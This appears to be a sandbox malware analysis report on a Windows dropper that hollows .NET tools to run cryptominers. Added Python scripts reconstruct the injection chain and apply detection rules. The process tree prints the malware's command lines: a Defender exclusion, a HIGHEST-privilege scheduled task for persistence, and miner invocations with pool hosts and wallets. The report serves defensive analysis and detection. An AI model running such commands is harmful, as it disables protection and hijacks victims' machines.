Analysis
max time kernel: 99s
max time network: 147s
platform: windows10-2004_x64
resource: win10v2004-20221111-en
resource tags: arch:x64, arch:x86, image:win10v2004-20221111-en, locale:en-us, os:windows10-2004-x64, system
submitted: 02/01/2023, 19:11
Static task: static1
Behavioral task: behavioral1
Sample: Build-5064047735-69594.exe
Resource: win7-20220812-en
General
Target: Build-5064047735-69594.exe
Size: 793KB
MD5: be1c30feca41f897c83974288b591f9a
SHA1: 82ca8fb9b994f8c99a6156e14057f4e5eab2a025
SHA256: b57943849425f3f3a4cc66192d47a1f15900c627f4bad7da4280ad72da553b8c
SHA512: 4e6b87a008dc822c3671a258c92b9aef511a017137d5a6e7cf5db78d96eaec3e19643b69ee4249958b2fa0c4e2c1d0174dc659feb102cdfb5ad0ee41fc7a6557
SSDEEP: 24576:hLAt3ieGOGoNOcfLtAz2QFPlePWBoy2Ij:te/VNLFIAPxdY
Malware Config
Signatures
Detects Phoenix Miner Payload 3 IoCs
All three hits are in the memory of PID 3908 (RegSvcs.exe, see the process tree), at 0x140000000, the default image base of a 64-bit PE, which matches the miner-style command line that process was started with.
resource | yara_rule
behavioral2/memory/3908-163-0x0000000140000000-0x000000014082B000-memory.dmp | miner_phoenix
behavioral2/memory/3908-164-0x0000000140000000-0x000000014082B000-memory.dmp | miner_phoenix
behavioral2/memory/3908-165-0x0000000140000000-0x000000014082B000-memory.dmp | miner_phoenix
Downloads MZ/PE file
Executes dropped EXE 2 IoCs
pid | Process
552 | mhnenpgoqiutiptl.exe
212 | ghoul.exe
UPX packed file 6 IoCs
resource | yara_rule
behavioral2/memory/3908-158-0x0000000140000000-0x000000014082B000-memory.dmp | upx
behavioral2/memory/3908-160-0x0000000140000000-0x000000014082B000-memory.dmp | upx
behavioral2/memory/3908-161-0x0000000140000000-0x000000014082B000-memory.dmp | upx
behavioral2/memory/3908-163-0x0000000140000000-0x000000014082B000-memory.dmp | upx
behavioral2/memory/3908-164-0x0000000140000000-0x000000014082B000-memory.dmp | upx
behavioral2/memory/3908-165-0x0000000140000000-0x000000014082B000-memory.dmp | upx
Checks computer location settings 2 TTPs 2 IoCs
Looks up the country code configured in the registry, likely a geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation | mhnenpgoqiutiptl.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation | ghoul.exe
Uses the VB.NET compiler (vbc.exe) for execution 1 TTPs
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid | Process
3908 | RegSvcs.exe
3908 | RegSvcs.exe
Suspicious use of SetThreadContext 2 IoCs
Both targets are Microsoft .NET Framework binaries that ghoul.exe also wrote to (see the WriteProcessMemory rows below): write the payload into the target, then redirect its thread, which is the process-hollowing pattern.
description | pid | Process | procid_target
PID 212 (ghoul.exe) set thread context of 2580 (vbc.exe) | 212 | ghoul.exe | 96
PID 212 (ghoul.exe) set thread context of 3908 (RegSvcs.exe) | 212 | ghoul.exe | 99
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour. (Generic signature text; this sample's payloads are cryptominers, as the process tree shows, so treat the ransomware hint as unconfirmed.)
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
4908 | schtasks.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid | Process
5040 | powershell.exe
5040 | powershell.exe
212 | ghoul.exe
212 | ghoul.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs
description | pid | Process
Token: SeDebugPrivilege | 212 | ghoul.exe
Token: SeDebugPrivilege | 5040 | powershell.exe
Suspicious use of WriteProcessMemory 34 IoCs
Identical rows are collapsed; the count column is the number of times the row appears (one row per cross-process write).
description | pid | Process | procid_target | count
PID 872 wrote to memory of 552 | 872 | Build-5064047735-69594.exe | 80 | 3
PID 552 wrote to memory of 212 | 552 | mhnenpgoqiutiptl.exe | 83 | 2
PID 212 wrote to memory of 5040 | 212 | ghoul.exe | 84 | 2
PID 212 wrote to memory of 4920 | 212 | ghoul.exe | 90 | 2
PID 4920 wrote to memory of 4908 | 4920 | cmd.exe | 92 | 2
PID 212 wrote to memory of 2580 | 212 | ghoul.exe | 96 | 14
PID 2580 wrote to memory of 2332 | 2580 | vbc.exe | 97 | 2
PID 212 wrote to memory of 3908 | 212 | ghoul.exe | 99 | 7
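The WriteProcessMemory and SetThreadContext rows above are what an analyst reads to reconstruct the injection chain. The script below does that mechanically: it parses the rows, collapses repeats into per-edge counts, and flags any target that received both a write and a thread-context change from the same source, which is the hollowing signature. This is an added example, not part of the tria.ge report; the rows are copied from the report (the 14 identical 212 -> 2580 rows and 7 identical 212 -> 3908 rows are cut to three and two to keep the sample short), the PID-to-image map is taken from the process tree, and the .NET host watch list is an assumption of the example.

```python
import re
from collections import Counter

# Rows copied from the report's IoC tables (constructed sample, repeats trimmed).
WPM_ROWS = """\
PID 872 wrote to memory of 552 872 Build-5064047735-69594.exe 80
PID 872 wrote to memory of 552 872 Build-5064047735-69594.exe 80
PID 872 wrote to memory of 552 872 Build-5064047735-69594.exe 80
PID 552 wrote to memory of 212 552 mhnenpgoqiutiptl.exe 83
PID 552 wrote to memory of 212 552 mhnenpgoqiutiptl.exe 83
PID 212 wrote to memory of 5040 212 ghoul.exe 84
PID 212 wrote to memory of 4920 212 ghoul.exe 90
PID 4920 wrote to memory of 4908 4920 cmd.exe 92
PID 212 wrote to memory of 2580 212 ghoul.exe 96
PID 212 wrote to memory of 2580 212 ghoul.exe 96
PID 212 wrote to memory of 2580 212 ghoul.exe 96
PID 2580 wrote to memory of 2332 2580 vbc.exe 97
PID 212 wrote to memory of 3908 212 ghoul.exe 99
PID 212 wrote to memory of 3908 212 ghoul.exe 99
"""

STC_ROWS = """\
PID 212 set thread context of 2580 212 ghoul.exe 96
PID 212 set thread context of 3908 212 ghoul.exe 99
"""

# PID -> image name, taken from the report's process tree.
PROCESS_IMAGES = {
    872: "Build-5064047735-69594.exe", 552: "mhnenpgoqiutiptl.exe",
    212: "ghoul.exe", 5040: "powershell.exe", 4920: "cmd.exe",
    4908: "schtasks.exe", 2580: "vbc.exe", 2332: "cmd.exe", 3908: "RegSvcs.exe",
}

# Signed .NET Framework binaries commonly used as hollowing hosts
# (assumption: an analyst-maintained watch list, not from the report).
DOTNET_HOSTS = {"vbc.exe", "csc.exe", "regsvcs.exe", "regasm.exe",
                "msbuild.exe", "installutil.exe", "applaunch.exe"}

# "PID <src> <verb> <dst> <src> <image> <target procid>" as the report prints it.
ROW_RE = re.compile(
    r"PID (?P<src>\d+) (?P<verb>wrote to memory of|set thread context of) "
    r"(?P<dst>\d+) (?P=src) (?P<image>\S+) (?P<target_id>\d+)$")


def parse_rows(text):
    """Return (src_pid, dst_pid, src_image) per row; lines that do not match are skipped."""
    out = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            out.append((int(m["src"]), int(m["dst"]), m["image"]))
    return out


def count_edges(rows):
    """Collapse repeated rows into (src, dst) -> number of writes observed."""
    return Counter((src, dst) for src, dst, _ in rows)


def hollowing_candidates(wpm_rows, stc_rows, images=PROCESS_IMAGES):
    """A target that got both WriteProcessMemory and SetThreadContext from the
    same parent is the classic hollowing signature: write the payload, then
    redirect the main thread into it.  Returns
    (src_pid, dst_pid, dst_image, dst_is_dotnet_host) sorted by target pid."""
    written = {(s, d) for s, d, _ in wpm_rows}
    found = []
    for src, dst, _ in stc_rows:
        if (src, dst) in written:
            img = images.get(dst, "?")
            found.append((src, dst, img, img.lower() in DOTNET_HOSTS))
    return sorted(found, key=lambda t: t[1])


if __name__ == "__main__":
    wpm, stc = parse_rows(WPM_ROWS), parse_rows(STC_ROWS)
    for (src, dst), n in sorted(count_edges(wpm).items()):
        print(f"{PROCESS_IMAGES[src]}({src}) -> {PROCESS_IMAGES[dst]}({dst}): {n} write(s)")
    for src, dst, img, lolbin in hollowing_candidates(wpm, stc):
        print(f"HOLLOWING? {PROCESS_IMAGES[src]}({src}) -> {img}({dst})"
              f"{' [signed .NET host]' if lolbin else ''}")
```

On the full report the same logic returns the two targets, vbc.exe and RegSvcs.exe, and the write counts show the bulk of the writes going to those two rather than to the helper cmd.exe and powershell.exe children, which only received the two writes that CreateProcess itself accounts for.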
Processes
1. C:\Users\Admin\AppData\Local\Temp\Build-5064047735-69594.exe (PID 872)
   Command line: "C:\Users\Admin\AppData\Local\Temp\Build-5064047735-69594.exe"
   - Suspicious use of WriteProcessMemory
   2. C:\Users\Admin\AppData\Local\Temp\mhnenpgoqiutiptl.exe (PID 552)
      Command line: "mhnenpgoqiutiptl.exe"
      - Executes dropped EXE
      - Checks computer location settings
      - Suspicious use of WriteProcessMemory
      3. C:\Users\Admin\AppData\Local\Temp\ghoul.exe (PID 212)
         Command line: "C:\Users\Admin\AppData\Local\Temp\ghoul.exe"
         - Executes dropped EXE
         - Checks computer location settings
         - Suspicious use of SetThreadContext
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of AdjustPrivilegeToken
         - Suspicious use of WriteProcessMemory
         4. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 5040)
            Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
         4. C:\Windows\System32\cmd.exe (PID 4920)
            Command line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "PFCIA" /tr "C:\ProgramData\Adobe\PFCIA.exe"
            - Suspicious use of WriteProcessMemory
            5. C:\Windows\system32\schtasks.exe (PID 4908)
               Command line: schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "PFCIA" /tr "C:\ProgramData\Adobe\PFCIA.exe"
               - Creates scheduled task(s)
         4. C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe (PID 2580)
            Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a verus -o stratum+tcp://na.luckpool.net:3956 -u RN9B8LkT5BcYXbc4ZVMYitfgKaA1wwbXwy.work -p x -t 3
            - Suspicious use of WriteProcessMemory
            5. C:\Windows\system32\cmd.exe (PID 2332)
               Command line: C:\Windows\system32\cmd.exe /c cls
         4. C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe (PID 3908)
            Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe -pool ssl://eu1-etc.ethermine.org:5555 -wal 0x20caf9B2c7aB54C3cB949F1489DD697327131861.Rig001 -coin etc -log 0
            - Suspicious use of NtSetInformationThreadHideFromDebugger
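The process tree carries the four observables a detection engineer would key on: a Microsoft .NET Framework tool (vbc.exe, RegSvcs.exe) started with a pool URL and wallet on its command line, a .NET tool whose parent lives in a user temp directory, PowerShell adding a Defender exclusion, and schtasks creating a HIGHEST-privilege task pointing into C:\ProgramData. The rules below run over process-creation records rebuilt from this tree. This is an added example, not part of the tria.ge report; the records are constructed from the report's PIDs, paths and command lines, and the .NET host watch list, the user-writable path list and the severity levels are assumptions of the example.

```python
import re
from collections import namedtuple

Proc = namedtuple("Proc", "pid ppid image cmdline")

# Constructed process-creation records (Sysmon event 1 style) rebuilt from the
# report's process tree; PIDs, image paths and command lines are the report's.
EVENTS = [
    Proc(872, 0, r"C:\Users\Admin\AppData\Local\Temp\Build-5064047735-69594.exe",
         r'"C:\Users\Admin\AppData\Local\Temp\Build-5064047735-69594.exe"'),
    Proc(552, 872, r"C:\Users\Admin\AppData\Local\Temp\mhnenpgoqiutiptl.exe",
         '"mhnenpgoqiutiptl.exe"'),
    Proc(212, 552, r"C:\Users\Admin\AppData\Local\Temp\ghoul.exe",
         r'"C:\Users\Admin\AppData\Local\Temp\ghoul.exe"'),
    Proc(5040, 212, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         "\"powershell\" -Command Add-MpPreference -ExclusionPath 'C:\\ProgramData'"),
    Proc(4920, 212, r"C:\Windows\System32\cmd.exe",
         r'"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 '
         r'/RL HIGHEST /tn "PFCIA" /tr "C:\ProgramData\Adobe\PFCIA.exe"'),
    Proc(4908, 4920, r"C:\Windows\system32\schtasks.exe",
         r'schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "PFCIA" '
         r'/tr "C:\ProgramData\Adobe\PFCIA.exe"'),
    Proc(2580, 212, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe",
         r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a verus "
         r"-o stratum+tcp://na.luckpool.net:3956 "
         r"-u RN9B8LkT5BcYXbc4ZVMYitfgKaA1wwbXwy.work -p x -t 3"),
    Proc(2332, 2580, r"C:\Windows\system32\cmd.exe", r"C:\Windows\system32\cmd.exe /c cls"),
    Proc(3908, 212, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe",
         r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe "
         r"-pool ssl://eu1-etc.ethermine.org:5555 "
         r"-wal 0x20caf9B2c7aB54C3cB949F1489DD697327131861.Rig001 -coin etc -log 0"),
]

# Assumptions of this example: a watch list of signed .NET Framework tools that
# are routinely hollowed, and directories an unprivileged user can write to.
DOTNET_HOSTS = {"vbc.exe", "csc.exe", "regsvcs.exe", "regasm.exe",
                "msbuild.exe", "installutil.exe", "applaunch.exe"}
USER_WRITABLE = ("c:\\programdata", "\\appdata\\", "c:\\users\\", "c:\\windows\\temp")
POOL_RE = re.compile(r"(?:stratum\+(?:tcp|ssl)|ssl|tcp)://([\w.\-]+):(\d+)", re.I)
WALLET_RE = re.compile(r"\s(?:-u|-wal|-user|--user)\s+(\S+)", re.I)
TASK_RE = re.compile(r'/tr\s+"?([^"]+?)"?(?:\s|$)', re.I)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rule_miner_cli(p, parents):
    """Pool URL on the command line; critical when the host image is a
    Microsoft .NET tool, which has no legitimate reason to talk to a pool."""
    m = POOL_RE.search(p.cmdline)
    if not m:
        return None
    w = WALLET_RE.search(p.cmdline)
    sev = "critical" if basename(p.image) in DOTNET_HOSTS else "high"
    return (sev, "miner_pool_cli", p.pid,
            f"host={basename(p.image)} pool={m[1]}:{m[2]} wallet={w[1] if w else '?'}")


def rule_dotnet_host_from_temp(p, parents):
    """A .NET Framework tool whose parent runs from a user temp directory is
    the shape of the hollowing in this report (ghoul.exe -> vbc.exe, RegSvcs.exe)."""
    parent = parents.get(p.ppid)
    if (basename(p.image) in DOTNET_HOSTS and parent
            and "\\appdata\\local\\temp\\" in parent.image.lower()):
        return ("medium", "dotnet_host_from_temp", p.pid, f"parent={basename(parent.image)}")
    return None


def rule_defender_exclusion(p, parents):
    """Add-MpPreference with any -Exclusion* parameter.  Caveat: PowerShell
    accepts abbreviated parameter names and encoded commands, so pair this with
    the Defender Operational log rather than trusting the command line alone."""
    c = p.cmdline.lower()
    if "add-mppreference" in c and "-exclusion" in c:
        return ("high", "defender_exclusion_added", p.pid, p.cmdline)
    return None


def rule_schtasks_persistence(p, parents):
    """schtasks /create that runs something from a user-writable path or asks
    for /RL HIGHEST; scored on schtasks.exe itself so the cmd.exe wrapper is
    not counted twice."""
    c = p.cmdline.lower()
    if basename(p.image) != "schtasks.exe" or "/create" not in c:
        return None
    m = TASK_RE.search(p.cmdline)
    target = m[1] if m else ""
    highest = "/rl highest" in c
    if highest or any(d in target.lower() for d in USER_WRITABLE):
        return ("medium", "schtasks_persistence", p.pid, f"target={target} highest={highest}")
    return None


RULES = (rule_miner_cli, rule_dotnet_host_from_temp,
         rule_defender_exclusion, rule_schtasks_persistence)


def run_rules(events):
    """Apply every rule to every record; returns (severity, rule, pid, detail) tuples."""
    parents = {e.pid: e for e in events}
    return [hit for p in events for rule in RULES if (hit := rule(p, parents))]


if __name__ == "__main__":
    for sev, rule, pid, detail in run_rules(EVENTS):
        print(f"[{sev:8}] {rule:26} pid={pid:<5} {detail}")
```

The dropper, loader and helper cmd.exe children produce no findings; everything the rules raise sits on the four processes that do the damage, and the two miner hits carry the pool host and wallet so the alert is immediately pivotable to network telemetry.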
Network
MITRE ATT&CK Enterprise v6
Downloads
Filesize: 899KB
MD5: 813862d29c21094ebd1f95feb80771ff
SHA1: 5e61691a9d791e798e19d99a27c9f9959d319e9b
SHA256: 5f1c900332c6ce00349719a6eccd13894fc312f2b6460d7f419ca49172c8623a
SHA512: 97fc207a77d4d11103817998177d656e520b889d7b79c9dd1ab4fd66cf1004a9060f2d6e4acf239a7b8016ffd60949a36e4e78ae26f990768a2952275e5b4580

Filesize: 1.5MB
MD5: 4c8d2d06487d07ec350aa5c5d699bb55
SHA1: adc4aa68f5aa4b0ea3f9a2ee82100234caea5b2d
SHA256: 5fe74ecfd6a9eeef45bed3760e4511c300dc843d17120361e5abd021cc107567
SHA512: 37f5dcf4a4e5f02c5dfb0d4c5cb18d4980efe387572fc3a50fa0d53a23c4403d8c17dbf2df9fa5bb647c0eb1f0a24d4c86e19aa2fb73b447c6cd62c6652b6bab